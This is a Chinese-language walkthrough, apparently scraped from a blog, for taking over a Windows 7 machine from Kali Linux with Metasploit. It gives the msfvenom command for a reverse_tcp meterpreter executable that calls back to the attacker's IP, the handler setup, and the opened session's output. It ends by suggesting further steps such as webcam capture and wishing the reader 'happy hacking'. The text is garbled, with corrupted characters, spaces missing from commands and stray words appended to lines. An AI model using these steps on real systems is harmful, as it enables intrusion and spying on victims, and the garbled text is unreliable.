Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让咱们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦——一切所以带来的后果和本文做者、译者无关。web
源机器详情
Kali Linuxc#
root@kali:/#uname-a
Linuxkali4.6.0-kali1-amd64#1SMPDebian4.6.4-1kali1(2016-07-21)x86_64 GNU/Linux
root@kali:/#
用作攻击对象的目标机器:windows
Windows7UltimateSP1
步骤 1:建立 Payload 程序
Payload 是一个相似于病毒或者木马的程序,能够运行在远程目标上 —— 为了黑掉那台机器。能够经过如下命令来建立 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。api
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128LPORT=4444--format=exe-o/root/program.exe
Noplatform was selected,choosingMsf::Module::Platform::Windowsfromthe payload
NoArchselected,selectingArch:x86fromthe payload
Noencoderorbadchars specified,outputting raw payload
Payloadsize:333bytes
Finalsizeof exefile:73802bytes
Savedas:/root/program.exe
root@kali:/# ls -la /root/program.exe
-rw-r--r--1root root73802Jan2600:46/root/program.exe
经过 ls 命令,咱们能够确认 Payload 程序是否成功生成在指定的位置。安全
步骤 2:运行 mfsconsole 命令启动 msf 命令窗口
root@kali:#msfconsole
.,,..
.\$$$$$L..,,==aaccaacc%#s$b.d8,d8P
d8P#$$$$$$$$$$$$$$$$$$$$$$$$$$$b.`BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'```?88'
d8bd8b.d8p d8888b ?88'd888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88'?88?8888bd88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P`d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
步骤 3:进行漏洞利用的细节
4444 端口:你能够按照本身的想法来选择使用哪一个端口
LHOST IP:表示 Kali Linux 机器的 IP,这里是 192.168.189.128。 使用以下命令来查看你的 Kali Linux 机器的 IP。
root@kali:/#ipr l
192.168.189.0/24dev eth0 proto kernel scopelinksrc192.168.189.128metric100
root@kali:/#
如今在 msf 命令窗口使用 use exploit/multi/handler 命令,以下:网络
msf>useexploit/multi/handler
msf exploit(handler)>
而后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp:session
msf exploit(handler)>setpayload windows/meterpreter/reverse_tcp
payload=>windows/meterpreter/reverse_tcp
如今使用 LHOST 和 LPORT 来设置本地 IP 和本地端口,以下:框架
msf exploit(handler)>setlhost192.168.189.128
lhost=>192.168.189.128
msf exploit(handler)>setlport4444
lport=>4444
最后使用 exploit 命令。tcp
msf exploit(handler)>exploit
[*]Startedreverse TCP handler on192.168.189.128:4444
[*]Startingthe payload handler...
如今你须要在 Windows 上运行 program.exe,一旦它在目标机器上执行,你就能够创建一个 meterpreter 会话。输入 sysinfo 就能够获得这台被黑掉的 Windows 机器的详情。工具
msf exploit(handler)>exploit
[*]Startedreverse TCP handler on192.168.189.128:4444
[*]Startingthe payload handler...
[*]Sendingstage(957999bytes)to192.168.189.1
[*]Meterpretersession1opened(192.168.189.128:4444->192.168.189.1:53091)at2017-01-2600:51:31+0000
meterpreter>sysinfo
Computer:MANN-PC
OS:Windows7(Build7601,ServicePack1).
Architecture:x64(CurrentProcessisWOW64)
SystemLanguage:en_IN
Domain:WORKGROUP
LoggedOnUsers:2
Meterpreter:x86/win32
一旦你获得了这些详细信息,就能够作更多的漏洞利用,或者经过 help 命令获取更多信息,以便列出你能够黑掉该系统的全部选项,好比 webcam_snap 命令获取网络摄像头,一样你还可使用其余更多的可用选项。祝你入侵愉快!!!! ←_←